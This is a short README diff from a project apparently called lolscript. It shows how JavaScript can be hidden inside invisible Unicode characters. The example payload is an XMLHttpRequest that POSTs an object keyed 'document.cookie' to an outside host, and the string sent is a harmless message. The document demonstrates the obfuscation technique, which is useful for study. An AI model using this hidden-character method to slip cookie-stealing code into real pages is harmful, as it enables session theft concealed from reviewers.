JaneOri/lolscript/README.md

   return unescape(escape(msg).replace(/uDB40%uDD/g,[]));
 };
 ```
-and this is the payload in lolscript:
+and this is the payload in `lolscript`:
 ```js
 "l" + encoder("o", `var xhr = new XMLHttpRequest(); xhr.open("POST", "https://bitovi.com/", true); xhr.send(JSON.stringify({ "document.cookie": "this easily could have been your session information. <3" }));`) + "l"
 ```